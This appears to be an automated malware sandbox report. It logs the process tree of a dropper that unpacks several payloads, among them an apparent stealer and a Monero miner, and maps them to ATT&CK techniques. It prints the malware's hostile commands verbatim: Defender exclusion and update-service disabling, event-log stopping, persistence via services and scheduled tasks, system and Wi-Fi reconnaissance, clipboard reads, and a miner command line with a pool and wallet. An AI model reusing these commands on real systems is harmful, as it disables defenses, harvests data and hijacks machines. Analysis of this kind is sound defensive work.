PID 60 wrote to memory of 3224	60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe	86
PID 60 wrote to memory of 3224	60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe	86
PID 3224 wrote to memory of 4688	3224	axplont.exe	99
PID 3224 wrote to memory of 4688	3224	axplont.exe	99
PID 2584 wrote to memory of 2232	2584	stub.exe	101
PID 2584 wrote to memory of 2232	2584	stub.exe	101
PID 2584 wrote to memory of 1348	2584	stub.exe	103
PID 2584 wrote to memory of 1348	2584	stub.exe	103
PID 2584 wrote to memory of 4912	2584	stub.exe	104
PID 2584 wrote to memory of 4912	2584	stub.exe	104
PID 1348 wrote to memory of 2352	1348	cmd.exe	107
PID 1348 wrote to memory of 2352	1348	cmd.exe	107
PID 4912 wrote to memory of 8	4912	cmd.exe	108
PID 4912 wrote to memory of 8	4912	cmd.exe	108
PID 2584 wrote to memory of 2580	2584	stub.exe	109
PID 2584 wrote to memory of 2580	2584	stub.exe	109
PID 3224 wrote to memory of 2256	3224	axplont.exe	111
PID 3224 wrote to memory of 2256	3224	axplont.exe	111
PID 3224 wrote to memory of 2256	3224	axplont.exe	111
PID 2580 wrote to memory of 1376	2580	cmd.exe	112
PID 2580 wrote to memory of 1376	2580	cmd.exe	112
PID 2584 wrote to memory of 3200	2584	stub.exe	114
PID 2584 wrote to memory of 3200	2584	stub.exe	114
PID 2256 wrote to memory of 1824	2256	33333.exe	113
PID 2256 wrote to memory of 1824	2256	33333.exe	113
PID 2256 wrote to memory of 1824	2256	33333.exe	113
PID 2256 wrote to memory of 3528	2256	33333.exe	115
PID 2256 wrote to memory of 3528	2256	33333.exe	115
PID 2256 wrote to memory of 3528	2256	33333.exe	115
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2584 wrote to memory of 1392	2584	stub.exe	117
PID 2584 wrote to memory of 1392	2584	stub.exe	117
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 2256 wrote to memory of 404	2256	33333.exe	116
PID 1392 wrote to memory of 3164	1392	cmd.exe	119
PID 1392 wrote to memory of 3164	1392	cmd.exe	119
PID 3224 wrote to memory of 4048	3224	axplont.exe	120
PID 3224 wrote to memory of 4048	3224	axplont.exe	120
PID 3224 wrote to memory of 4048	3224	axplont.exe	120
PID 2584 wrote to memory of 4636	2584	stub.exe	121
PID 2584 wrote to memory of 4636	2584	stub.exe	121
PID 2584 wrote to memory of 2512	2584	stub.exe	163
PID 2584 wrote to memory of 2512	2584	stub.exe	163
PID 2584 wrote to memory of 3548	2584	stub.exe	123
PID 2584 wrote to memory of 3548	2584	stub.exe	123
PID 2584 wrote to memory of 4980	2584	stub.exe	125
PID 2584 wrote to memory of 4980	2584	stub.exe	125
PID 404 wrote to memory of 2400	404	RegAsm.exe	129
PID 404 wrote to memory of 2400	404	RegAsm.exe	129
PID 404 wrote to memory of 2400	404	RegAsm.exe	129
PID 404 wrote to memory of 2208	404	RegAsm.exe	130
PID 404 wrote to memory of 2208	404	RegAsm.exe	130
PID 2512 wrote to memory of 1540	2512	cmd.exe	132
PID 2512 wrote to memory of 1540	2512	cmd.exe	132
PID 3224 wrote to memory of 2440	3224	axplont.exe	133
PID 3224 wrote to memory of 2440	3224	axplont.exe	133
PID 3224 wrote to memory of 2440	3224	axplont.exe	133
PID 3548 wrote to memory of 1836	3548	cmd.exe	135

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1376	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
"C:\Users\Admin\AppData\Local\Temp\e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:60
- C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
  "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
    "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
    3⤵
    - Executes dropped EXE
    PID:4688
  - - C:\Users\Admin\AppData\Local\Temp\onefile_4688_133611402475713356\stub.exe
      "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:2232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1348
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4912
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:8
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2580
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        5⤵
        
        PID:3200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1392
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4636
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3244
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3548
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:1836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:4980
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:4352
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        
        PID:2636
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:4812
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:5564
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:5612
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:5628
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:5644
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:5660
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:5676
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:5688
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:5708
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:5720
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:5736
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:5748
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:5768
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:5780
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:5800
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:5832
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:5944
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:6052
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        
        PID:6112
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        Gathers network information
        
        PID:6128
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:5132
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        
        PID:4832
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        
        PID:5228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        
        PID:2460
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        
        PID:2016
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:660
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5604
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:5628
- - C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
    "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1824
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3528
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:404
    - - C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2400
    - - C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:5880
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:5844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 300
      4⤵
      Program crash
      PID:4232
- - C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:4048
- - C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
    "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2440
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4016
- - C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
    "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5088
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:836
  - - C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      PID:2160
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 352
        5⤵
        Program crash
        
        PID:3528
  - - C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe
      "C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1376
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5176
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5464
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4812
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1920
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:5596
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:5656
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:5688
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:5512
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:6004
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:5996
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:5992
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:5752
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        5⤵
        Launches sc.exe
        
        PID:5788
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:1208
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:3288
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        5⤵
        Launches sc.exe
        
        PID:2544
- - C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4168
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4712
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1376
- - C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
    "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2212
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      PID:2108
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:5168
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:5184
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:5212
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:5228
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:5248
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:5276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:5992
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:6072
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        Executes dropped EXE
        
        PID:6084
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:5176
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        Executes dropped EXE
        
        PID:5224
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:5252
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        Executes dropped EXE
        
        PID:1228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:5760
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:5768
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        Executes dropped EXE
        
        PID:5808
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        Executes dropped EXE
        
        PID:5872
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        5⤵
        Executes dropped EXE
        
        PID:5292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2256 -ip 2256
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2160 -ip 2160
1⤵
PID:2512

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4352

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2016

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv mHvJlgRXVUysScnf/7K0kA.0.2
1⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4016

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
1⤵
- Executes dropped EXE
PID:3492

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:5296
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5408
- - C:\Windows\Temp\698247.exe
    "C:\Windows\Temp\698247.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5496

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:2772
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3912

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:5832
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:5980
- - C:\Windows\Temp\506308.exe
    "C:\Windows\Temp\506308.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:5012

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5872
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3988
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4980
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5776
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5844
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4512
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3936
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2044
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:6120
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:3856
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:6128
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:5564
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5568
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1028

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:656

C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
1⤵
- Executes dropped EXE
PID:4812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

